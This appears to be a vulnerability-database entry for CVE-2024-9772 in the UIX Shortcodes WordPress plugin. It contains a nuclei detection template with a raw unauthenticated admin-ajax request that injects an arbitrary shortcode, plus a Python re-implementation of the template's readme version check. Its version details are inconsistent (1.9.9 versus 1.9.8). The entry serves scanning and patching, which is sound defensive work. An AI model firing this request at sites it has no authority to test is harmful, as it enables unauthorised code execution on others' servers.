WordPress UIX Shortcodes <= 1.9.7 - Unauthenticated Shortcode Execution

Date: 29 Jun 2026 05:52:57
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com

Unauthenticated arbitrary shortcode execution in WordPress UIX Shortcodes up to 1.9.7; update to 1.9.8 or newer.

Code
id: CVE-2024-9772

info:
  name: WordPress UIX Shortcodes <= 1.9.7 - Unauthenticated Shortcode Execution
  author: kankburhan
  severity: high
  description: |
    The Uix Shortcodes – Compatible with Gutenberg plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.9.9. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
  impact: |
    Unauthenticated attackers can execute arbitrary shortcodes through the uixscform_ajax_shortcodepreview AJAX action, potentially leading to information disclosure, privilege escalation, or remote code execution depending on available shortcodes.
  remediation: |
    Update UIX Shortcodes plugin to the latest patched version (>= 1.9.8).
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9772
    - https://downloads.wordpress.org/plugin/uix-shortcodes.1.9.7.zip
    - https://plugins.trac.wordpress.org/browser/uix-shortcodes/trunk/shortcodes/templates/default/frontpage-init.php#L9
    - https://wordpress.org/plugins/uix-shortcodes/#developers
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/3000758d-68e0-46a6-aef0-e2407a828168?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-9772
    cwe-id: CWE-94
    epss-score: 0.01411
    epss-percentile: 0.69299
    cpe: cpe:2.3:a:uiux:uix_shortcodes:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: uiux
    product: uix_shortcodes
    framework: wordpress
    publicwww-query: "/wp-content/plugins/uix-shortcodes/"
  tags: cve,cve2024,wordpress,wp-plugin,wp,wpscan,shortcode,uix-shortcodes,vuln

variables:
  string: "{{to_lower('{{randstr}}')}}"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/uix-shortcodes/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Uix Shortcodes')"
          - "compare_versions(version, '<= 1.9.7')"
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=uixscform_ajax_shortcodepreview&previewcode=[uix_sc_text text='{{string}}']

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "{{string}}")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402204aa72e00f86ba4060479bd401e4be850b9bf5b6032bd5a029854ceeefd1be82f02206f1acbec72490f21df7c376f470f7540b45f3a237582c008016c0ad0e3e10b85:922c64590222798bb761d5b6d8e72950
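The template's first stage only proceeds when the plugin's readme.txt is present and its "Stable tag" is at or below 1.9.7. The following stand-alone Python re-implements that version gate so it can be run offline against saved readme bodies, for example when triaging a fleet of sites from a crawl. It is an added example and is not part of the nuclei template or of the plugin; the readme bodies in SAMPLE_READMES are constructed, and the function names are this example's own. It also covers a case the template leaves implicit: versions must be compared numerically per component, because a plain string comparison would wrongly flag a hypothetical 1.9.10 as "<= 1.9.7".

```python
import re

# Constructed readme.txt bodies (not fetched from any site) that mimic the
# "Stable tag:" header the template extracts with 'Stable tag: ([0-9.]+)'.
SAMPLE_READMES = {
    "vulnerable": "=== Uix Shortcodes ===\nContributors: uiux\nStable tag: 1.9.7\nTested up to: 6.5\n",
    "patched": "=== Uix Shortcodes ===\nContributors: uiux\nStable tag: 1.9.8\nTested up to: 6.5\n",
    "later_minor": "=== Uix Shortcodes ===\nContributors: uiux\nStable tag: 1.9.10\n",
    "other_plugin": "=== Some Other Plugin ===\nStable tag: 1.0.0\n",
    "no_tag": "=== Uix Shortcodes ===\nContributors: uiux\n",
}

# Same regex the template's extractor uses, group 1 is the version string.
STABLE_TAG_RE = re.compile(r"Stable tag: ([0-9.]+)")
CONSTRAINT_RE = re.compile(r"\s*(<=|>=|==|<|>)\s*([0-9.]+)\s*")


def parse_version(text):
    """Turn '1.9.7' into the tuple (1, 9, 7); empty components are ignored."""
    return tuple(int(part) for part in text.split(".") if part != "")


def compare_versions(version, constraint):
    """Evaluate a nuclei-style constraint such as '<= 1.9.7' numerically.

    Components are compared as integers, and shorter versions are padded with
    zeros so that '1.9' equals '1.9.0'. This is the property a string
    comparison lacks: '1.9.10' <= '1.9.7' is True for strings, False here.
    """
    match = CONSTRAINT_RE.fullmatch(constraint)
    if not match:
        raise ValueError("unsupported constraint: %r" % constraint)
    op, reference = match.groups()
    left, right = parse_version(version), parse_version(reference)
    width = max(len(left), len(right))
    left += (0,) * (width - len(left))
    right += (0,) * (width - len(right))
    return {
        "<=": left <= right,
        ">=": left >= right,
        "==": left == right,
        "<": left < right,
        ">": left > right,
    }[op]


def extract_stable_tag(body):
    """Return the Stable tag version from a readme body, or None if absent."""
    match = STABLE_TAG_RE.search(body)
    return match.group(1) if match else None


def assess_readme(status_code, body, max_affected="1.9.7"):
    """Mirror the template's first-stage matcher on a saved readme response.

    The three conditions are the same as in the template: HTTP 200, the body
    names the plugin, and the extracted version satisfies '<= max_affected'.
    """
    if status_code != 200 or "Uix Shortcodes" not in body:
        return {"affected": False, "version": None, "reason": "plugin readme not found"}
    version = extract_stable_tag(body)
    if version is None:
        return {"affected": False, "version": None, "reason": "no Stable tag in readme"}
    affected = compare_versions(version, "<= " + max_affected)
    reason = "version <= %s" % max_affected if affected else "version above %s" % max_affected
    return {"affected": affected, "version": version, "reason": reason}


if __name__ == "__main__":
    for label, body in SAMPLE_READMES.items():
        print(label, assess_readme(200, body))
```

Only the readme gate is reproduced here; the second request in the template is the confirmation step and is best left to the scanner itself. In practice the same numeric comparison should also be applied to the version in the site's plugin list, because a readme.txt can lag behind or be removed by hardening plugins, in which case the gate above reports "plugin readme not found" rather than a clean result.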


04 Feb 2026 07:00 (current)
Vulners AI Score: 6.2 (Medium risk)
CVSS 3.1: 7.3
EPSS: 0.01411